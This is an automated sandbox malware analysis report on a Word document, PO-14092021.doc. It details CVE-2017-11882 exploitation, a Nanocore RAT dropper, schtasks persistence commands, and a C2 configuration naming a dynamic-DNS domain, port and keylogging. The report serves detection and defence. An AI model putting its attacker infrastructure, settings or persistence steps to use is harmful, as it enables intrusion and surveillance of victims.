Play interactive tour

Edit tour

Windows Analysis Report PO-14092021.doc

Overview

General Information

Sample Name:	PO-14092021.doc
Analysis ID:	483042
MD5:	93abec14185d380695f65beaaca97b84
SHA1:	c18eaeac2c4371dd8e79de62ce60a7b7767f995a
SHA256:	e73b710e825a32ebe4122240ecac87eff1bc76fe130fc41fc5858dafaf96d3b7
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Sigma detected: NanoCore

Yara detected AntiVM3

Detected Nanocore Rat

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected Nanocore RAT

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Writes to foreign memory regions

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Allocates memory in foreign processes

.NET source code contains potential unpacker

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Injects a PE file into a foreign processes

Office equation editor drops PE file

.NET source code contains very large strings

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses dynamic DNS services

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Installs a raw input device (often for capturing keystrokes)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Uses a known web browser user agent for HTTP communication

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Office Equation Editor has been started

Contains functionality to detect virtual machines (SLDT)

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2008 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 2576 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

plugmangd5693.exe (PID: 1580 cmdline: C:\Users\user\AppData\Roaming\plugmangd5693.exe MD5: 19665F929613C0E945FF13DD25C9362E)

schtasks.exe (PID: 2244 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\RWbqWnnjDWI' /XML 'C:\Users\user\AppData\Local\Temp\tmp3709.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

RegSvcs.exe (PID: 1292 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)

RegSvcs.exe (PID: 2996 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)

schtasks.exe (PID: 2560 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3FEE.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

schtasks.exe (PID: 1516 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2DF5.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

taskeng.exe (PID: 2212 cmdline: taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)

RegSvcs.exe (PID: 2960 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0 MD5: 72A9F09010A89860456C6474E2E6D25C)

smtpsvc.exe (PID: 2128 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 MD5: 72A9F09010A89860456C6474E2E6D25C)

smtpsvc.exe (PID: 2664 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 72A9F09010A89860456C6474E2E6D25C)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "6f656d69-7475-8807-1300-000c0a4c", "Group": "Default", "Domain1": "blackbladeinc52.ddns.net", "Domain2": "Backup Connection Host", "Port": 1664, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000008.00000002.671546681.00000000005A0000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000008.00000002.671546681.00000000005A0000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x100a5:$x1: NanoCore.ClientPluginHost 0x100e2:$x2: IClientNetworkHost 0x13c15:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfe0d:$a: NanoCore 0xfe1d:$a: NanoCore 0x10051:$a: NanoCore 0x10065:$a: NanoCore 0x100a5:$a: NanoCore 0xfe6c:$b: ClientPlugin 0x1006e:$b: ClientPlugin 0x100ae:$b: ClientPlugin 0xff93:$c: ProjectData 0x1099a:$d: DESCrypto 0x18366:$e: KeepAlive 0x16354:$g: LogClientMessage 0x1254f:$i: get_Connected 0x10cd0:$j: #=q 0x10d00:$j: #=q 0x10d1c:$j: #=q 0x10d4c:$j: #=q 0x10d68:$j: #=q 0x10d84:$j: #=q 0x10db4:$j: #=q 0x10dd0:$j: #=q
00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xa8645:$x1: NanoCore.ClientPluginHost 0xa8682:$x2: IClientNetworkHost 0xac1b5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xa83ad:$a: NanoCore 0xa83bd:$a: NanoCore 0xa85f1:$a: NanoCore 0xa8605:$a: NanoCore 0xa8645:$a: NanoCore 0xa840c:$b: ClientPlugin 0xa860e:$b: ClientPlugin 0xa864e:$b: ClientPlugin 0xa8533:$c: ProjectData 0xa8f3a:$d: DESCrypto 0xb0906:$e: KeepAlive 0xae8f4:$g: LogClientMessage 0xaaaef:$i: get_Connected 0x24302:$j: #=q 0xa9270:$j: #=q 0xa92a0:$j: #=q 0xa92bc:$j: #=q 0xa92ec:$j: #=q 0xa9308:$j: #=q 0xa9324:$j: #=q 0xa9354:$j: #=q
00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x23a65:$a: NanoCore 0x23abe:$a: NanoCore 0x23afb:$a: NanoCore 0x23b74:$a: NanoCore 0x3721f:$a: NanoCore 0x37234:$a: NanoCore 0x37269:$a: NanoCore 0x5021b:$a: NanoCore 0x50230:$a: NanoCore 0x50265:$a: NanoCore 0x23ac7:$b: ClientPlugin 0x23b04:$b: ClientPlugin 0x24402:$b: ClientPlugin 0x2440f:$b: ClientPlugin 0x36fdb:$b: ClientPlugin 0x36ff6:$b: ClientPlugin 0x37026:$b: ClientPlugin 0x3723d:$b: ClientPlugin 0x37272:$b: ClientPlugin 0x4ffd7:$b: ClientPlugin 0x4fff2:$b: ClientPlugin
Process Memory Space: plugmangd5693.exe PID: 1580	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb5e43:$x1: NanoCore.ClientPluginHost 0xb5e80:$x2: IClientNetworkHost 0xb9389:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xc40f6:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x2859fc:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: plugmangd5693.exe PID: 1580	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: plugmangd5693.exe PID: 1580	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: plugmangd5693.exe PID: 1580	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xb5bfc:$a: NanoCore 0xb5c0c:$a: NanoCore 0xb5c53:$a: NanoCore 0xb5c62:$a: NanoCore 0xb5def:$a: NanoCore 0xb5e03:$a: NanoCore 0xb5e43:$a: NanoCore 0xc0760:$a: NanoCore 0xc0772:$a: NanoCore 0xc07ae:$a: NanoCore 0x282066:$a: NanoCore 0x282078:$a: NanoCore 0x2820b4:$a: NanoCore 0xb5c20:$b: ClientPlugin 0xb5cac:$b: ClientPlugin 0xb5e0c:$b: ClientPlugin 0xb5e4c:$b: ClientPlugin 0xc077b:$b: ClientPlugin 0xc07b7:$b: ClientPlugin 0x282081:$b: ClientPlugin 0x2820bd:$b: ClientPlugin
Process Memory Space: RegSvcs.exe PID: 2996	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 2996	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x9035:$a: NanoCore 0x9048:$a: NanoCore 0x907a:$a: NanoCore 0x17518:$a: NanoCore 0x176d0:$a: NanoCore 0x176e4:$a: NanoCore 0x1cc14:$a: NanoCore 0x1cf82:$a: NanoCore 0x1cfd5:$a: NanoCore 0x1d00e:$a: NanoCore 0x1d081:$a: NanoCore 0x16d279:$a: NanoCore 0x16fac3:$a: NanoCore 0x16fad6:$a: NanoCore 0x16fb08:$a: NanoCore 0x175603:$a: NanoCore 0x175616:$a: NanoCore 0x175648:$a: NanoCore 0x17ae64:$a: NanoCore 0x17ae73:$a: NanoCore 0x1853be:$a: NanoCore
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.RegSvcs.exe.764629.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
8.2.RegSvcs.exe.764629.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
8.2.RegSvcs.exe.764629.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.2.RegSvcs.exe.384dabc.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
8.2.RegSvcs.exe.384dabc.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
8.2.RegSvcs.exe.384dabc.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
8.2.RegSvcs.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
8.2.RegSvcs.exe.760000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
8.2.RegSvcs.exe.760000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
8.2.RegSvcs.exe.760000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.2.RegSvcs.exe.3848c86.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d5df:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d60c:$x2: IClientNetworkHost
8.2.RegSvcs.exe.3848c86.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d5df:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e6ba:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d5f9:$s5: IClientLoggingHost
8.2.RegSvcs.exe.3848c86.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.2.RegSvcs.exe.3848c86.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d595:$a: NanoCore 0x2d5aa:$a: NanoCore 0x2d5df:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d351:$b: ClientPlugin 0x2d36c:$b: ClientPlugin
8.2.RegSvcs.exe.5a0000.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
8.2.RegSvcs.exe.5a0000.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
8.2.RegSvcs.exe.384dabc.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x287a9:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x287d6:$x2: IClientNetworkHost
8.2.RegSvcs.exe.384dabc.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x287a9:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x29884:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x287c3:$s5: IClientLoggingHost
8.2.RegSvcs.exe.384dabc.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
8.2.RegSvcs.exe.38520e5.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x24180:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x241ad:$x2: IClientNetworkHost
8.2.RegSvcs.exe.38520e5.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x24180:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x2525b:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x2419a:$s5: IClientLoggingHost
8.2.RegSvcs.exe.38520e5.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
8.2.RegSvcs.exe.760000.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
8.2.RegSvcs.exe.760000.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
8.2.RegSvcs.exe.760000.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.plugmangd5693.exe.a1f94b8.10.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.plugmangd5693.exe.a1f94b8.10.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.2.plugmangd5693.exe.a1f94b8.10.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.plugmangd5693.exe.a1f94b8.10.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
8.2.RegSvcs.exe.2811644.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
8.2.RegSvcs.exe.2811644.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
Click to see the 33 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2996, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2576, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2576, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\plugmangd5693.exe, CommandLine: C:\Users\user\AppData\Roaming\plugmangd5693.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\plugmangd5693.exe, NewProcessName: C:\Users\user\AppData\Roaming\plugmangd5693.exe, OriginalFileName: C:\Users\user\AppData\Roaming\plugmangd5693.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2576, ProcessCommandLine: C:\Users\user\AppData\Roaming\plugmangd5693.exe, ProcessId: 1580

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Show sources

Source: Process started

